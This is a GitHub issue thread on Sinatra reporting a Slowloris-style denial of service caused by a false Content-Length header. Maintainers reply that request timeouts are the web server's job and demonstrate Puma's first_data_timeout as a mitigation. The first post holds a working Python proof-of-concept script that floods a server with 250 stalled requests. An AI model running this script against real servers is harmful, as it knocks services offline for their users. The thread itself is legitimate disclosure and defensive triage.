### ISSUE TITLE
Denial of Service with crafted Request Header

### ISSUE THREAD

**Issue by emlinhax** [sinatra/sinatra#2045]
Hello,

When setting the Content-Length Header to some arbitrary number, the server waits for the rest of the data.
If you do alot of these requests at once, the server stops responding to any other requests.
Its the Slow-Loris principle... just Slow-Sinatra.

===== The POC =====

server (bash):
```bash
ruby -rsinatra -e'set :public_folder, "."; set :port, 8000'
```

client:
```python
import concurrent.futures
import http.client

def make_request():
    conn = http.client.HTTPConnection("localhost", 8000)
    headers = {"Content-Length": "1337"}
    try:
        conn.request("GET", "/", headers=headers)
        conn.getresponse()
        conn.close()
    except Exception as e:
        print(f"Request failed: {e}")

def main():
    with concurrent.futures.ThreadPoolExecutor(max_workers=250) as executor:
        futures = [executor.submit(make_request) for _ in range(250)]
        for future in concurrent.futures.as_completed(futures):
            future.result()

if __name__ == "__main__":
    main()
```

**Comment by dentarg** [comment]
Sinatra is not a web server.

**Comment by dentarg** [comment]
Okay, you didn't mean Slow-Loris per see, I guess. I still want to know, which web server are you using in your PoC?

**Comment by emlinhax** [comment]
I posted the command I ran above. Literally just that.

**Comment by dentarg** [comment]
The server is one that can run a rack app, like webrick or puma. Sinatra is just a web framework. Please post the full output from when you run `ruby -rsinatra ...`.

**Comment by dentarg** [comment]
@emlinhax can you provide the info requested?

**Comment by ioquatix** [comment]
I just stumbled into this issue - I believe it's unrelated to #2031 which is the server side `content-length`, but this issue is using client uploads to slurp up connections by submitting only part of a request. Protecting against this requires some kind of timeout/minimum data rate protection.

**Comment by dentarg** [comment]
That sounds like the responsibility of the web server then, not Sinatra?

**Comment by dentarg** [comment]
I guess @emlinhax may have been using webrick?

If [Puma](https://github.com/puma/puma) was used, see https://github.com/puma/puma/blob/master/SECURITY.md

**Comment by dentarg** [comment]
@emlinhax because you can not run sinatra without a ruby webserver (such as puma or webrick)

`ruby -rsinatra -e'set :public_folder, "."; set :port, 8000'` prints some info when it starts, here's how it looks with Puma

```shell
$ docker run --rm -it ruby:3.3.5 bash
root@ab4837abaeb9:/# gem install sinatra puma rackup
Fetching sinatra-4.0.0.gem
Fetching rack-3.1.8.gem
Fetching rack-session-2.0.0.gem
Fetching rack-protection-4.0.0.gem
Fetching tilt-2.4.0.gem
Fetching mustermann-3.0.3.gem
Successfully installed tilt-2.4.0
Successfully installed rack-3.1.8
Successfully installed rack-session-2.0.0
Successfully installed rack-protection-4.0.0
Successfully installed mustermann-3.0.3
Successfully installed sinatra-4.0.0
Fetching puma-6.4.3.gem
Fetching nio4r-2.7.4.gem
Building native extensions. This could take a while...
Successfully installed nio4r-2.7.4
Building native extensions. This could take a while...
Successfully installed puma-6.4.3
Fetching rackup-2.2.0.gem
Successfully installed rackup-2.2.0
9 gems installed

A new release of RubyGems is available: 3.5.16 → 3.5.22!
Run `gem update --system 3.5.22` to update your installation.

root@ab4837abaeb9:/# ruby -rsinatra -e'set :public_folder, "."; set :port, 8000'
/usr/local/bundle/gems/sinatra-4.0.0/lib/sinatra/base.rb:1849: warning: Rack::Logger is deprecated and will be removed in Rack 3.2.
== Sinatra (v4.0.0) has taken the stage on 8000 for development with backup from Puma
Puma starting in single mode...
* Puma version: 6.4.3 (ruby 3.3.5-p100) ("The Eagle of Durango")
*  Min threads: 0
*  Max threads: 5
*  Environment: development
*          PID: 211
* Listening on http://127.0.0.1:8000
Use Ctrl-C to stop
```

here's how it looks with WEBrick

```
$ docker run --rm -it ruby:3.3.5 bash
root@cef6f0306484:/# gem install sinatra webrick rackup
Fetching sinatra-4.0.0.gem
Fetching mustermann-3.0.3.gem
Fetching rack-protection-4.0.0.gem
Fetching tilt-2.4.0.gem
Fetching rack-session-2.0.0.gem
Fetching rack-3.1.8.gem
Successfully installed tilt-2.4.0
Successfully installed rack-3.1.8
Successfully installed rack-session-2.0.0
Successfully installed rack-protection-4.0.0
Successfully installed mustermann-3.0.3
Successfully installed sinatra-4.0.0
Fetching webrick-1.9.0.gem
Successfully installed webrick-1.9.0
Fetching rackup-2.2.0.gem
Successfully installed rackup-2.2.0
8 gems installed

A new release of RubyGems is available: 3.5.16 → 3.5.22!
Run `gem update --system 3.5.22` to update your installation.

root@cef6f0306484:/# ruby -rsinatra -e'set :public_folder, "."; set :port, 8000'
/usr/local/bundle/gems/sinatra-4.0.0/lib/sinatra/base.rb:1849: warning: Rack::Logger is deprecated and will be removed in Rack 3.2.
[2024-11-04 14:23:16] INFO  WEBrick 1.9.0
[2024-11-04 14:23:16] INFO  ruby 3.3.5 (2024-09-03) [aarch64-linux]
== Sinatra (v4.0.0) has taken the stage on 8000 for development with backup from WEBrick
[2024-11-04 14:23:16] INFO  WEBrick::HTTPServer#start: pid=36 port=8000
```

Can you please post how it looks for you so we understand what you are using?

**Comment by dentarg** [comment]
> I just stumbled into this issue - I believe it's unrelated to #2031 which is the server side `content-length`, but this issue is using client uploads to slurp up connections by submitting only part of a request. Protecting against this requires some kind of request read timeout/minimum data rate protection.
> 
> You might like to investigate `IO#timeout` that I introduced recently. That is part of the fix. In Falcon, it defaults to 30 seconds (maybe too high?) which would partially mitigate this attack.

It defaults to 30 seconds in Puma too, where it is called `first_data_timeout`.

I ran the above python code (saved to `attack.py`) without changing any Puma settings, and it ran for 30 seconds. When I ran with `first_data_timeout 2`, it ran for two seconds:

```shell
$ ulimit -S -n 4000 # needed in macOS
$ time python attack.py
python attack.py  0.08s user 0.09s system 8% cpu 2.201 total
```

I was able to make other requests the whole time:

```shell
$ while true ; do ; sleep 1 ; curl localhost:8000 ; date ; done
...
```

Repro:

```ruby
$ cat app.rb
# frozen_string_literal: true

require "sinatra"

get "/" do
  body "OK"
end
```
```ruby
$ cat config/puma.rb
# this file is  automatically found by Puma
first_data_timeout 2
```

```ruby
$ cat Gemfile
# frozen_string_literal: true

source "https://rubygems.org"

gem "puma", "~> 6.4"
gem "sinatra", "~> 4.1"
gem "rackup", "~> 2.2"
gem "json", "~> 2.8" # to avoid warnings about ostruct
```

I ran it in Docker, letting Sinatra start Puma:

```shell
$ docker run --rm -it -w /app -v $(pwd):/app -p 8000:8000 ruby:3.3.6 bash
# bundle
...
# bundle e ruby app.rb -o 0.0.0.0 -p 8000
== Sinatra (v4.1.1) has taken the stage on 8000 for development with backup from Puma
Puma starting in single mode...
* Puma version: 6.4.3 (ruby 3.3.6-p108) ("The Eagle of Durango")
*  Min threads: 0
*  Max threads: 5
*  Environment: development
*          PID: 425
* Listening on http://0.0.0.0:8000
Use Ctrl-C to stop

```
